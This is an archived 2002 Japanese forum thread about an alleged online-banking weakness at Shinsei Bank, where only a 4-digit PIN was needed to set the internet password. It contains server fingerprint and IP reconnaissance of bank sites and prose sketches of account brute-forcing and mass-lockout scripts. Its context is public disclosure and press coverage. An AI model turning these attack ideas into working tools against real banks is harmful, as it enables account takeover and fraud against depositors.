　　　)> ゝ(_|　 |_) ノ　　| |r |/
　　　|,|　　 く　　 ~″　/ト_/　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　 |________________ノ /ヘ/　<　さあ新生の顧客口座から頂こうか
　　　　ヽ　　�＝@　　//　|　　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　 ＼　　　　 ／~ 　 |ヽ
　,―――-ヽ___イ______／ | ＼
/　　　 　 　/ 　| (　 ヽ　　|　　|＼_______
　　　　 　 /　　 |冫-く　 /　　 |　　 　　＼
　　　　　　|　　　||　　 | /　　　|　　　　　　＼

それを注意せずに名前使わせる"mago"もいい面の皮かも。

ちなみにYahoo!Cafe日比谷はこちら

http://cafe.yahoo.co.jp/3rd/index.html

しんなま本店1Fロビーにある。

勝ち組　　　　　　　　　　　 負け組　　　　　　　　　　　　自滅組
　┝━━━━━━━━━━┿━━━━━━━━━━┥
　　　　　　　　　　　　　　　　　　　　　　　　88彡ミ8。 　 /)
　　　　　　　　　　　　　　　　　　　　　　　8ﾉ/ノ＾＾ヾ8。( i )))
　　　　　　　　　　　　　　　　　　　　　　　 |(| ∩　∩|| / / 　　＜ｺｺ!
　　　　　　　　　　　　　　　　　　　　　　　从ゝ__▽_.从 /
　　　　　　　　　　　　　　　　　　　　　　　 /||＿､＿|| /
　　　　　　　　　　　　　　　　　　　　　　 / （＿＿＿)
　　　　　　　　　　　　　　　　　　　　　　＼(ﾐｌ＿,＿(
　　　　　　　　　　　　　　　　　　　　 　　　/. 　＿　＼
　　　　　　　　　　　　　　　　　　　　　　／_ ／ 　＼ _.〉
　　　　　　　　　　　　　　　　　　　　／　／　　　／　/
　　　　　　　　　　　　　　　　　　　 (二/　　 　　（二）

ありがとうございます>>389

>>400
汎用機はプログラムモードで動いているから、ＴＣＰ／ＩＰ側から
コマンド打ち込んでも受け付けないってわけ。

勝ち組（自力）東京三菱銀行　三菱信託銀行
勝ち組（他力）あおぞら銀行
引分け　三井住友銀行　富士銀行、第一勧業銀行、日本興業銀行 UFJ銀行
負け組　あさひ銀行、大和銀行、中央三井信託銀行、安田信託銀行、
　　　　UFJ信託銀行 住友信託銀行
自滅組　新生銀行

あの、横浜銀行はﾀﾞｲｼﾞｮﾌﾞですかぁ？
ATM いつも行列だし、さいきん行員からの
営業がよくあるんですが。

>>403
新生よりクラッカーに対しては強いだろ

そーか、サンクス
ぢぁ、資金分散、ちっと待つかぁ（w

まさか新生、ＳＮＡ、ＦＮＡを全部ＴＣＰ／ＩＰ　or　イーサにプロトコルコンバート
してるんじゃないだろうな。
開発用端末とかもＴＣＰ／ＩＰにしてるんじゃないだろうな。

とりあえずマスコミが書くまでは定期age。

金融庁の森昭治長官は１１日、「増資の努力や健全行との合併を計画中の金
融機関もあると聞いているので、２０日間で実を結ぶことを強く期待してい
る」と述べた。さすがに「ダメな銀行は淘汰する」とは言わないが、「決算
期に自己資本比率や預金量を水増しして生き延びているような下位行は３月
末までに何とか決着をつけたいというのが本音」（金融アナリスト）という
ことのようだ。来年４月からは普通預金もペイオフの対象となり、いよいよ
“逃げ場”はなくなる。預金者の選別がさらに進むのは必至で、銀行にとっ
て厳しい試練の日々が続く。

マスはカクことはないだろ
定期かぁ、もーぜんぶ下ろしたし、定額だけだなぁ
パンフ入ってたんで、ハイリスクノーリターン?の
ファンドのこと検索してみるかぁ
ってことだ。

放置したら日本の金融システム「自浄作用無し」と見なされるけどね。

しんなま ＲＡＱ まれにあるご質問

セキュリティ

Q. ログイン時に、４桁数字の暗証番号の他に、パワーダイレクトパスワードの入力
も必要で、煩わしいのですが、これは冗長ではありませんか？
A. ＡＴＭと異なり、インターネットバンキングでは、４桁数字の暗証番号では安全性
が十分ではなく、それだけではお客様の資金の安全を確保できないと判断したため、
英数字のパスワードも併用するようにいたしました。

Q. パスワードはどうやって決めるのですか？
A. お客様がパワーダイレクトを初めて利用なさるときに、画面上で自由に決めて
頂きます。なお、安全のため、パスワードは定期的に変更することをおすすめ
します。

Q. パスワードを決めるときの本人確認はどうやってなされるのですか？
A. キャッシュカード共用の４桁暗証番号で本人確認を行います。

Q. 口座を作った後、パワーダイレクトを最初に利用するまでの間は、４桁暗証だけ
で私になりすませるということですか？
A. 口座を作られましたら、できるだけお早めにパワーダイレクトパスワードの設定
をなさることをおすすめします。

Q. 私はインターネットを使わないので、パワーダイレクトの機能は停止して頂き
たいのですが？
A. 申し訳ございません。パワーダイレクトだけ停止することは承っておりません。

Q. 私はインターネットを使っていません。どうやってパワーダイレクトパスワード
を設定したらよいのですか？
A. お手数ですが、インターネットをお使いのご友人に端末を借りるなどして、
設定をお願いします。

Q. 私は、自分の口座がインターネットからも使える状態になっていることを知り
ませんでした。どうして教えてくれなかったのですか？
A. ご利用規程をお読みください。

Q. インターネットを使っていない人は、パワーダイレクトパスワードの設定を
していないのではないかと思われますが、これは危険ではないですか？
A. セキュリティのことですので、お答えできません。

しんなま ＲＡＱ まれにあるご質問

セキュリティ

Q. ログイン時に、４桁数字の暗証番号の他に、パワーダイレクトパスワードの入力
も必要で、煩わしいのですが、これは冗長ではありませんか？
A. ＡＴＭと異なり、インターネットバンキングでは、４桁数字の暗証番号では安全性
が十分ではなく、それだけではお客様の資金の安全を確保できないと判断したため、
英数字のパスワードも併用するようにいたしました。

Q. 振込時に、他行のシステムのように乱数表を使った第二暗証の確認がないのですが、
安全上の問題はないのでしょうか？
A. 当行では、ログイン時に、暗証番号とパスワードの二重チェックを行っており、
十分に安全であるため、煩わしい乱数表による第二暗証を省きました。

Q. パワーダイレクトパスワードはどうやって決めるのですか？
A. お客様がパワーダイレクトを初めて利用なさるときに、画面上で自由に決めて
頂きます。なお、安全のため、パスワードは定期的に変更することをおすすめ
します。

Q. パスワードを決めるときの本人確認はどうやってなされるのですか？
A. キャッシュカード共用の４桁暗証番号で本人確認を行います。

Q. 口座を作った後、パワーダイレクトを最初に利用するまでの間は、４桁暗証だけ
で私になりすませるということですか？
A. 口座を作られましたら、できるだけお早めにパワーダイレクトパスワードの設定
をなさることをおすすめします。

Q. 私はインターネットを使わないので、パワーダイレクトの機能は停止して頂き
たいのですが？
A. 申し訳ございません。パワーダイレクトだけ停止することは承っておりません。

Q. 私はインターネットを使っていません。どうやってパワーダイレクトパスワード
を設定したらよいのですか？
A. お手数ですが、インターネットをお使いのご友人に端末を借りるなどして、
設定をお願いします。

Q. 私は、自分の口座がインターネットからも使える状態になっていることを知り
ませんでした。どうして教えてくれなかったのですか？
A. ご利用規程をお読みください。

Q. インターネットを使っていない人は、パワーダイレクトパスワードの設定を
していないのではないかと思われますが、これは危険ではないですか？
A. セキュリティのことですので、お答えできません。

>>411-412

大変に的確なご指示でございます。
もしかして、あなたさまは、財務省・金曜庁に嫌われている、
警察庁情報通信局出身の方では。（あはは、あはは

やっぱり国を想う気持ちでしょ（藁

Operating System and Web Server for direct.btm.co.jp
The site direct.btm.co.jp is running Netscape-Enterprise/4.1 on HP-UX.

OS, Web Server and Hosting History for direct.btm.co.jp
OS Server Last changed IP address Netblock Owner
HP-UX Netscape-Enterprise/4.1 22-Aug-2001 203.178.124.232 The Bank of Tokyo-Mitsubishi,Ltd.
HP-UX Netscape-Enterprise/4.0 7-Nov-2000 203.178.124.232 The Bank of Tokyo-Mitsubishi,Ltd.

Operating System and Web Server for direct.smbc.co.jp
The site direct.smbc.co.jp is running IBM_HTTP_Server/1.3.6.4 Apache/1.3.7-dev (Unix) on unknown.

OS, Web Server and Hosting History for direct.smbc.co.jp
OS Server Last changed IP address Netblock Owner
unknown IBM_HTTP_Server/1.3.6.4 Apache/1.3.7-dev (Unix) 5-Mar-2002 202.221.2.70 THE SUMITOMO BANK, LIMITED
unknown IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Unix) 3-Mar-2002 202.221.2.70 THE SUMITOMO BANK, LIMITED
unknown IBM_HTTP_Server/1.3.6.4 Apache/1.3.7-dev (Unix) 15-Jan-2002 202.221.2.70 THE SUMITOMO BANK, LIMITED
unknown IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Unix) 13-Jan-2002 202.221.2.70 THE SUMITOMO BANK, LIMITED
unknown IBM_HTTP_Server/1.3.6.4 Apache/1.3.7-dev (Unix) 14-Dec-2001 202.221.2.70 THE SUMITOMO BANK, LIMITED
AIX IBM_HTTP_Server/1.3.6.4 Apache/1.3.7-dev (Unix) 2-Apr-2001 202.221.2.70 THE SUMITOMO BANK, LIMITED

ageます。しんなまが会見するまで。

ここのアドレスをしんなまに通報しる！

しんなまのCM見るたびにやり場のない怒りがこみ上げる。
早く報道してくれマスコミ。

本当は警察に相談したか指導がきたんじゃないのか（ｗ

>>418
だとしたら良い面の皮だね。
きっと担当者の顔にノミを当てても血が流れないぐらい厚いんだろうね。

マスコミ連中がここ読んでるのは分かってる。

取り付け騒ぎや犯罪教唆を恐れて書かないのは分かるが、本末転倒に
なってないか？
セキュリティホールがこの板で公表されて何日経っている？
その間にあの銀行は山のようにCMを流し、何も知らない人間は
危険な口座を作り、入金し続けている。
ネットの中で流れる情報は、所詮ネットの中だけだ。
ネットの外にいる人間には、マスコミ以外十分に情報を伝える事は
出来ない。
報道は社会の公器だというのなら、責任を果たしてくれ。

でなければ、この国自体の信用は失墜する。

>>420
カッコイイ。

このIPについて検証きぼんぬ。

>>422
InterSpin (InterSpin)
SUBA-018-004 [サブアロケーション] 202.33.162.0
株式会社 新生銀行 (Shinseibank, Ltd.)
SHINSEINET [202.33.162.192 <-> 202.33.162.255] 202.33.162.192/26

何でここからアクセスすると新生銀行のＩＰになるんだ

http://cafe.yahoo.co.jp/3rd/index.html

しんなま本店1Fロビーにある。

>>424
ひょっとしてそこ、新生銀行のFWの内側だったからとか。
だったら怖い。

前にここから２ちゃんねる見てて、タイムアウトうんぬんって表示が
表示されたことあるんだわさ。
少なくともIE標準の表示じゃなかったね。

>>426
串通してんだろ。

「通常の銀行の10分の１のコストと，3分の１の開発期間でシステムを刷新できた」と八城会長兼社長
は胸を張る。

張る

>>427
ping拒絶する串って普通か？

セキュアルータだろ

んなもんネットカフェで使うか？
まるっきり無駄金じゃんか。

あげあげあげ。

へなちょこ銀行age

www.intel.co.jp へ行って、ユーザー事例(左の方）をクリックしてみろ。
IA Serverを動かしている銀行の事例紹介があるぞ。
既出か？

ヤフーカフェって、一応セキュリティキー使ってるけど、ActiveXとか使うと
プログラムのインストールできるんだよね。マシンに。
で、利用して色々面白い物がインストール可能だと思うのだが・・・。

俺知らない。

しんなまってソフトバンクの資本入ってなかったっけ？
でもってシステムコンサルタントは
ソフトバンクテクノロジーズ。
てーかバンク適当だな。
そしてYBBはソフトバンク・・・

http://headlines.yahoo.co.jp/hl?a=20020318-00000009-vgb-sci
このスレ 紹介されてるYO
記念age

預金抜きより、こっちの方がやばいのでは？
http://money.2ch.net/test/read.cgi/money/1009805183/491
http://money.2ch.net/test/read.cgi/money/1009805183/643
http://money.2ch.net/test/read.cgi/money/1009805183/660

プラグイン方式のウィルスっていたよね。そんなのにこういう機能組み込まれて
ばら撒かれたらこわいね。時限式で新年度早々４月１日に一斉に口座ロックとか。
早く対処してもらいたいよ。新生ばかりじゃないけど。

新生銀行が預金者に断りなくネットで口座を公開

　日本長期信用銀行から行名を変更し1年が経過した新生銀行だが、個人顧客開拓を目的に開始した
「新生総合口座PowerFlex」でセキュリティホールが存在する可能性が発見された。

　「新生総合口座PowerFlex」は、様々な取引が電話でもインターネットでも24時間365日利用でき
ることをうたったサービスであり、簡単な手続きで取引を開始できることが特徴だ。今回、2ちゃん
ねるで指摘されたオンラインバンキングの脆弱性は、口座開設手続きおよび利用があまりにも簡単す
ぎることから始まった。

　新生銀行のインターネット取引は、口座をもっている人に断りなく、オンラインで口座利用がすぐ
できる状態になっている。しかも4桁の暗証番号だけでオンライン専用のパスワードを発行する仕組み
になっている。他行のオンラインバンキングで採用されている第2暗証番号はない。例えば、暗証番号
を固定し、口座番号を入力していけば口座番号、暗証番号共に合致してログインできてしまうことも考
えられる。

（詳しくはScan　および　Scan Daily EXpress 本誌をご覧ください）
http://shop.vagabond.co.jp/m-ssw01.shtml
http://shop.vagabond.co.jp/m-sdx01.shtml（Scan）
[3月18日12時25分更新]
------------------------------------------------------------------------------------------

http://headlines.yahoo.co.jp/hl?a=20020318-00000010-vgb-sci

おねがいだからウラ取ってよ。記事には証拠も載せてよ。> scan
2ch に書かれてることが真実とは限らんでしょ。

>>441
確かに。
裏取る前に載せたら新生側がこっそり対策して、
証拠隠滅を図る可能性があるし。
･･･でも、対策取らなさそうな雰囲気ってのが何ともw

なんだかこのスレッドかなりかっこいい事になってるぞ。

Yahoo!ニュースのリンクから来ました。
記念カキコ（ｗ

　このような事態に対し編集部では引き続き取材を行うべく、今後新生銀行と監督する立場にある金融庁監督局に対し追加取材を行いこの場で公表していく。ネットワークの安全性がクローズアップされている今、
取り返しのつかない状況になる前に現状の問題点を公表し、信頼性の向上のための早急な対応を望む。また、本記事は、2ちゃんねるの掲示板に寄せられた情報をもとに検証作業などを行った。誌面を借りて、お礼
を申し上げたい。

今回参考にした2ちゃんねるの掲示板
http://pc.2ch.net/test/read.cgi/sec/1007968094/l50
新生銀行
http://www.shinseibank.co.jp/（Scan）
[3月18日17時34分更新]

きみら、なんだか感謝とかされているんだけど
そんなのって２ちゃんねらーとして、個人として
誰に一番最初にこの気持ちを伝えたいですか？

今夜の祭りの会場はここで良いのか？

f-tokyo-144116-l3.zero.ad.jp

それで誰かの金を誰かの金にしたりはもうしたのかい？
それとも誰か漫画喫茶ゲラゲラに走ってる最中かい？

ゼロのやつがなんかやったのか？

ｶｺｲｲ

ぉぃ。板住人はいないのだろうか。
こんな素敵な２ちゃんねる話はひさしぶりじゃないか。
いやはじめてかもしれない。

なんてきみらは世間に対して奥ゆかしいんだ。

それともなんかの雑誌に真性銀行はメインフレムじゃなくて
やっすいPCでサーバたててるのをみてやれる！とかおもって
こんな案配なのかい？

どっちにしてもきみらってなんだかかっこいいじゃないか。
誰が誰の金を誰の口座のどうするんだい？そういうんじゃないのかい？

できれば、金持ちから貧乏人とかの当たり前の美談ではなくて
貧乏人から新聞販売店とかのエキセントリックな攻撃をみせたり
そういうことはしないのかい？

だれもいない。。。。。。。。

本日午前に掲載しました『新生銀行が預金者に断りなくネットで口座を公開』
というタイトルの記事の中で、新生銀行と同じビルに入っていたヤフーカフェが、
ファイアウォール内部におかれているという記述があり、これについてヤフー様
よりご指摘をいただきました。お詫びするとともに訂正いたします。

　ヤフーカフェは、たまたまアドレスブロックが、新生銀行と同じであるだけ
でファイアウォール内部あるわけではありませんでした。また、ヤフーカフェ
のネットワークは、新生銀行のネットワークとは切り離されており、セキュリ
ティ上の問題は全くないとのことです。

　関係者および読者のみなさまに、深くお詫び申し上げるとともに訂正いたし
ます。今後、このようなことがないよう編集部一同努力いたします。

https://www.netsecurity.ne.jp/article/1/4391.html

>>454
安全とまでいってくれりゃ、一番安全なネットカフェだな。

※ごめん、別スレに誤爆したんで再投稿。

記事書いた人はここ見てるそうだから、もう一つ新生のセキュリティ問題を調べてくれ。

PowerDirectにログインするとSSL(暗号)で保護されたページに入るんだけど、
ボタン等を押して他のページに移る度にSSLで保護された領域から一旦出てまた入ってる。
その度に警告ダイアログ(「情報は保護されない」みたいなやつ)が出てすごく心臓に悪い。

IE6では発生しないけど、Mozilla 0.9.9で確実に発生する。Mozillaの方が技術的な標準に
正確に準拠してると思われるので、実際にセキュリティ問題が発生してると思う。
IEユーザは気付いてないだけの可能性あり。

>>454
>>393,>>426のカキコをどう説明するのだろうか。
大方慌ててネットワーク組み替えたのでは。

>>457
串通してあるだけだろ　ヴォケ

ネットカフェだな

何で、アドレスブロックが新生とカフェで同じになるの？
それって、ＮＩＣがダブルブッキングしてるってことか？
それじゃ、ＩＰからドメイン所有者がわからんってことじゃ
ないのか？
どうやって、ルーティングするんだ？

いまいち良く分からん

ＮＩＣに調査依頼してみるよ

※　教会に手投げ弾５人死亡　パキスタンで対米テロか
　はっきり言ってこの事件、その場にいた外交官の家族連中が間抜け。米国大使館に近い教会なんぞにこの時期に通う方がどうかしている。襲ってくれと誘っているようなもの。

神を信じるものは何も恐れず。これ常識。あなた何も分かっていないね。

>>458
ただの串が選択的にフィルタリングするんか？

>>460
朕はＳＣＡＮが突っ込み入れることを切望します。

私はScanが墓穴を掘らないこと切望します。ヒント（ＶＬＡＮ）

山を見て河見たら、流れが見えるっしょ。もう遅いよ

ラッピングしてタグ付けるんだろ

　難しくて判らないけどMACユーザは、インターネットバンキングはできないのかな

インテルのサイトを見たけど申請は画期的なことやってんじゃないの。もちろ
んこのセキュリティーホールが破られたら新聞もんだよね。でもその前に欧米
諸国で当たり前の脱メインフレームを日本で本気でやっているのはここだけジ
ャン。その辺をもう少し評価したらいいんじゃないの。このままじゃ日本の金
融機関は終わりだよ。要は世界的な競争力なし。

＞４７０
この際ＭＡＣが何で関係あるの。バカ！！

>>472
マカーは簡単に釣れる。(w

＞４７１
あなたは何を根拠にそんなことを言っているのですか。もしセキュリティーに
問題があるのならばお金を預ける気持ちにはなれません。
皆さんの言っていることが正解だと思います。

　名無し＠お腹おっぱい。さんの言う通りだけど...
メインフレームならセキュリティは破られないの

>>471
あーおわるおわる終わった方がいいんぢゃないの
でっかい四つもくさってるしさ
せきゅりてぃとか行ってる場合ぢゃないんだよ ヴォケ

＞４７４
それじゃー、その皆さんが言っているセキュリティーホールを
破って見せてください何日かかりますか？　あなたは２ｃｈのヒーローに
なるでしょう。また同時に犯罪者になります。そんなことよりも私は申請の
前向きな姿勢を評価します。でも改善はしてよね申請さん！

って言うか。Scanとかいうメディアの姿勢が疑われるね。２ｃｈの書き
込みを信じて何も裏づけなしに記事を書くなんて。新生に金をあづけて
いる身からすると、いい迷惑だよ。おれは新生のサービスに満足
しているし。重箱の奥を突っつくみたいなことしないでもっといいネタ
探してよ。お前のとこみたいなメディアは絶対信用しないよ。

＞＞４７８
あなたの意見に反対です。金融機関たるものは安定したシステム基盤を
礎に確固たる地位を築いてきたのです。ここでＰＣの上で動く基幹システム
なって言われても受け入れられません。ましてやインターネット技術が
ネットワークの基盤なんて到底受け入れません。パソコンで銀行業務
をやるなんて本末転倒だ！！！

税金いっぱい使ってるんだから今度こけたら許さんぞ。まじめにやれー

>>454
だから裏取れと言ってるのに。無能か＞scan

＞４７９
あなたは長年レガシーシステムをやってこられた方とお見受けします。
憤りは分かります。ただし現実を受け入れないとあなたとあなたの会社の
将来はないのではないでしょうか。またオープン系はみな同じ土壌で語れ
るのでセキュリティーも分かりやすいねですが。レガシーのセキリティーは
ほんとにセキュァーなのでしょうか？クローズな世界だけに本当に分かりに
くいですよね！？

＞Scan
統計的に見ると今までの金融機関の事故は内部的なものがほとんどですよね。
もっとその辺にフォーカスされてはいかがですか。新しいことにフォーカス
されるのはいいかもしれませんが。もっと身近で昔からある問題にフォーカス
されたほうが社会のため御社ためと考えます。金儲けは身近なところに！
墓穴を掘らぬように。Yahoo News を見て訪ねてきたものより。

>>470
大丈夫だと思うよ。
新生銀行のロビーにはMacが数台置いてあって、来店した客に開放しているから。
ご自由にお使いください、って。
自分の口座にログインしている客をこの間見かけた。

金融板、経済板、株式板の住人が書き込んだネタを
裏を取らずに記事にして、間違うとセキュ板のせいに
思われるのが一番迷惑。

すんごい勢いで荒れてるけど。
>>484みてーの、論外だってわかんねーのかな。
それこそFWの中で外部に出られないような端末ならともかく。
誰が扱うか、何処に行ってるか分からない端末でネットバンク使うなんて
セキュリティ意識有る人間なら出来ないし、それを推奨する銀行もどうか
してる。

もひとつ。執拗にScanとかセキュリティ屋を貶そうとする意図がミエミエ
な連中が居る。多分しんなまの関係者だと思うんだけど。
行政処分喰らう前に穴塞いだ方がいいんでない？
こんな場末で荒らしてないでさ。いくらなんでもマスコミが本格的に
動き出したら金融庁も頬被りしてごまかしちゃくんないよ。国家的信用って
問題があるからね。

>>484 あれはＭＡＣではないらしい。液晶やマウスだけ無理矢理ウィンドウズパソコンにつなげたそうな。なんでも店頭は明るすぎて普通の液晶じゃみえずらかったらしい。同行したＭＡＣフリークの友人は邪道だと嘆いていた。

基幹システムがメインフレームで有ろうと無かろうと、サインアップ時に
口座番号と4ケタのパスワードしか要求されないようなシステム作ってる
点が今回問題提起されてる訳でしょ。
コストパフォーマンスの事を持ち出し話逸らそうとしたってダメですぜ、
工作員さん（藁

この板はもしかするとしんなまとScanとかセキュリティ屋のバトル会場かね？

銀行がパスワード認証でSSL使ってないなんて、恐すぎ・・・
(((( ;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
こんなとこ使えねぇよ！ヽ(`Д´)ﾉ

>>471
放置口座の抜き問題だけじゃないよ。ランダムな口座番号にでたらめな暗証番号入れて
片っ端から不特定多数の口座をロックさせるようなスクリプトをネットカフェなんかに
仕掛ける奴出てきたらどうする。そんな機能をメールウィルスにプラグインする事
だって出来る奴いそうだよ。インターネット口座のログインＩＤは英数字大文字小文字区別で
口座番号とは別にするのは、もはや事実上の業界標準だよ。さもなきゃクッキーなんかで
端末認証しっかりやるとか。
＃この件は、新生以外にもあてはまるところがまだいくつかあるけど。

>>478
分かんないかな。今まで危険にさらされてきた被害者が新生ユーザであると同時に
マスコミが取り上げることでシステムが改修され一番利益を受けるのも新生ユーザ
なんだよ。

Winベースでもっとセキュリティの高いシステム組むことはいくらでも可能だよ。
今回の新生の件は、システム設計＆仕様があまりにお粗末ということ。
工期を急ぎすぎてインドから、そのままシステム買ってくるようなことして
ろくろく検収してないから、こういうことになる。

郵貯のオンラインバンクもあと数週間で一般始動するわけだが、
こっちはかなりまともっぽくてよかった。

MacOS版Flash Player 6を使うと取り引き不能に陥る現象（ソニー銀行）
https://www.netsecurity.ne.jp/article/1/4389.html

Scanからこんな記事が出てるけど、それってセキュリティの問題か？

それよりもさ、ソニー銀行のフラッシュって、ちゃんとSSL効いてるの？
フラッシュが中でどんな通信やってるか、ぜんぜんわからないよ。
どうやったら重要な情報が暗号化されてることを確かめられるの？
ソニー銀行への取材、きぼんぬ

>>492
認証にクッキー、それも食べ残されるようなクッキーを使うのは、
最大のセキュリティホールを作ると思う。

横からつまみ食いされちゃうよ。

ねぇねぇ、日比谷のヤフーカフェ、先週までは夕方行ってもすぐ端末に
ありつけたんだが、今週に入ってから昨日も今日も満席で入れないのよ。

さて、何が起こっているんでしょうかね（藁

なんかソニーバンクの口座開設がクリックしても動かないんだけどなんかあったのかな？！

http://money.2ch.net/test/read.cgi/money/1009805183/717n
↑こういうドアフォが金融板にはいたりするわけです。
セキュリティの低劣なシステムの問題の中には、例えば勝手に
マネーロンダリング時にトンネルにされてしまったり、なんてのも
考えられるわけです。なにせ休眠口座の場合、オンラインバンクで
あれば足もつかずに資金移動を行える。犯罪収益をあらかじめ
パス抜いた口座に振り込ませ、別の借名口座や仮名口座にリレー
するなんて事が為される可能性。そんな可能性が高いシステム
組んでぼけっとしてれば、マネーロンダリング防止条約の理念に
反するような真似をするアホな国扱いされるのは確実。
ともかく資金移動だけはきちんと管理できるシステムでないと、
そのシステムはあらゆる意味での犯罪の温床でしかあり得なくなる。

「金を扱う」って意味を考えられないシステム屋がコストだけしか
考えずにシステムを組もうとするとこうなるんだろう。
なんまんだぶなんまんだぶ。

Yahooを見てきたんだけど。
>>498
＞なにせ休眠口座の場合、オンラインバンクであれば足もつかずに
＞資金移動を行える。

普通銀行では、資金移動がある口座を休眠口座とは呼びません。
通常休眠口座扱いになると確認なしに取引はおこなわせないところがほとんどです。

>>500
スマソ、なにせ俺しんなまバンカーじゃないもんでね（藁

で、通常に定期の更新手続きが行われてる場合どうよ。
あと、パワーダイレクトは口座開設すれば利用開始に特別な手続きは
いらんわけだが、長期間利用開始されてなければロックしてるのか？
約款には規定ないようだが。この場合、通常の取引はあるわけだよね。
銀行がいう「休眠」状態ではないわけだ。

ちなみにしんなまのパワーダイレクト約款にはこういう条文が。

８．本人確認
(1)本サービスを利用するにあたり、利用者は、新生パワ−ダイレクト
画面上にて3桁の店番号と7桁の口座番号からなる10桁の番号（以下
「口座番号」という）、４桁の暗証番号およびパワ−ダイレクトパスワー
ドを、コンピュータ端末より入力してください。入力された口座番号、
暗証番号およびパワ−ダイレクトパスワードと当行で登録している
それらの番号とが各々一致したことを当行にて確認した場合は、
入力した者を利用者本人と見なし、サービス・取引の取扱いをいたし
ます。
(2) 当行所定の方法によりコンピュータ端末より入力された口座番号、
暗証番号およびパワ−ダイレクトパスワードと、当行に登録してある
口座番号、暗証番号およびパワ−ダイレクトパスワードとの一致を
確認して取り扱いましたうえは、これらの番号につき不正使用その他の
事故があったとしても、そのために生じた損害については、当行は
責任を負いません。暗証番号、パワ−ダイレクトパスワードは利用者
本人の責任において厳重に管理し、他人に教えたり、紛失・盗難に遭う
ことがないよう十分に注意してください。暗証番号、パワ−ダイレクト
パスワードが盗用された疑いがあるときは、直ちに当行が「新生パワー
コール」という名称で表記する電話番号により接続される電話センター
（以下「当行コールセンター」といいます。）にご連絡ください。

盗用が認識できないユーザーはどうなるんだろうね。

　

なんでここに一端リンクされるのか？
個人情報を集めているとしたら、法に触れてます。
管理者は、逮捕ですな。

ime.nu
Request: ime.nu
------------------------------------------------------------------------
.NU Domain LTD Whois service

Domain Name (UTF-8): ime.nu
Record ID: 412944.

Record expires on 21-Sep-2003.
Record created on 21-Sep-2001.
Record status: Active.

Domain servers in listed order:
tako.2ch.net 210.224.163.192
www.ohayou.com 61.200.63.158

Copyright by .NU Domain LTD - http://www.nunames.nu
------------------------------------------------------------------------
Database last updated: Thu Mar 21 00:31:26 2002
------------------------------------------------------------------------

うちの銀行ホームページもねーんだぜ！！
ヽ(`Д´)ﾉｳﾜｧｧｧｧｧｧｧｧﾝ

>個人情報を集めているとしたら、法に触れてます。

アホ？

それはそれとして、これどうよ。
http://203.138.109.168/ebank2ch.html
口座開設自体は郵送でやるみたいだけど、
非SSLで申し込みさせて「セキュリティ万全！」というのはどうかと。

>>505
切込隊長に言ってください。
「お金ケチりたいからってそういう真似は止めようね」って。

>>501
しんなまバンカーでわないよん。

銀行のいう休眠口座っていうのは、普通預金口座が対象。
それも、数年以上資金の出し入れが全くない場合のこと。

しんなまは知らないが、他行で休眠扱いになったときは、
インターネットバンキング、キャッシュカードともに使用不可だったよ。

富士銀行のＡＴＭでロト６買ったら、
外国から変な宝くじの案内が来るようになった
情報管理はどうなっとるんじゃい

>>508
それって、たまたまタイミングが一緒なだけで関係ないと思われ。
外国の宝くじの案内って、手紙でくるのかな？
メールでくるのかな？
日本語？　英語？

保守age。

で、今日の第一勧銀のATM故障だが、
原因は何？

>>511
一定の処理で転けたんだろ？
簡単な推測で悪いが、その部分のモジュール入れ替えたときに
バグが混入した。んだとおもう。
簡易な改修を反映させるんだったら週末の定期保守時間帯で
できるだろう。

>>511 >>512
よくわからない記事なんだけど、抜粋。詳しくはリンク先当たってくれ。

第一勧業銀行のATM（現金自動預け払い機）約3100台で2002年3月25日朝に発
生した障害の原因は，前日の3月24日に投入したプログラムの不具合であるこ
とが明らかになった。
そもそも3月25日の朝に障害が発生した原因は，問題のプログラムを投入した
3月24日が日曜日であったため。第一勧銀のATMでは，日曜日の振り込み処理
を翌営業日扱いとしてデータを蓄積しているので，振り込み処理自体は動作
しない。翌営業日である3月25日の午前8時45分に問題のプログラムが稼働し
て初めて，障害が発生したわけだ。
http://itpro.nikkeibp.co.jp/free/NC/NEWS/20020325/4/

新生銀行逝って良し

しんなまって何考えてるのかわからんのは事実。
先週末の日経だったかな？　別刷りでEコマースの話題が出てたんだけど、
電子商取引について、セキュリティの確保は急務みたいな論調の記事が
載ってる。
それに逆行してみせるようなしんなまの態度。
連中は日本の電子マネーをぶち壊すつもりでこんな事やってるんじゃない
かと疑っちゃうね。
Scanの皆さん、はやいとこ金融庁に事態の深刻さを教えてやるニダ。

速板のしんなまスレ見えないＹＯ！
他のスレ見えてるのに。

もうみんな飽きたのかね…

みずほ祭でいっぱいいっぱいなんじゃないのとか言ってみるﾃｽﾄ

だってもう、どうともならんやん?

みずほ銀行誕生、システムは大丈夫か？
５８１店・３万人・７０兆円…処理が最大の懸案
　日本興業、第一勧業、富士の３行が来月１日から、「みずほ銀行」と
「みずほコーポレート銀行」に再編される。メガバンク誕生前夜、看板
かけ替えやパンフレット入れ替えなど休日返上で新たな船出に備えるこ
とになる行員も多い。なかでも最大の懸案はコンピューターシステムの
統合だ。「Ｙ２Ｋ並みの勤務態勢で万全を期す」（広報担当）と緊張が
高まっている。

板違いだHO>>520

4月1日に開業したばかりのみずほ銀行で，ATM（現 金自動預け払い機）のトラブ
ルが発生している。午前 9時30分現在，キャッシュ・カードを使った現金の預け
入れや引き出し，残高照会のほか，通帳記入ができない。店舗では客からの質問
が出始めており，行員は対応に追われている。みずほ銀行広報部によると原因は
不明。店舗の行員は復旧の目処も立っていな いとしている。
http://itpro.nikkeibp.co.jp/free/NC/NEWS/20020401/1/

みずほ銀行本店（旧第一勧業銀行本店）の担当者は，「昨日の夜になって
システム の統合作業が終わったため，旧富士銀行のキャッシュ・カード
や通帳を使ったATMの 試験がほとんどできなかった」と説明している。
http://itpro.nikkeibp.co.jp/free/NC/NEWS/20020401/2/

>>523
これがホントだったら、よく今日サービスを開始したもんだ。
システム試験成績書を見せなさい。> 担当者

>>522-524
初心者板へ(･∀･)カエレ！

>>525
おまえがな。

526 名前：名無しさん＠お腹いっぱい。 投稿日：02/04/01 18:15
>>525
おまえがな。
　　　　~~~~~~
(･∀･)ｸ･ｸ･ｸ

>>527
５２６を晒しageるスレはここですか？

( ﾟДﾟ)ﾊｧ?
ﾟДﾟ)ﾊｧ?
Дﾟ)ﾊｧ?
ﾟ)ﾊｧ?
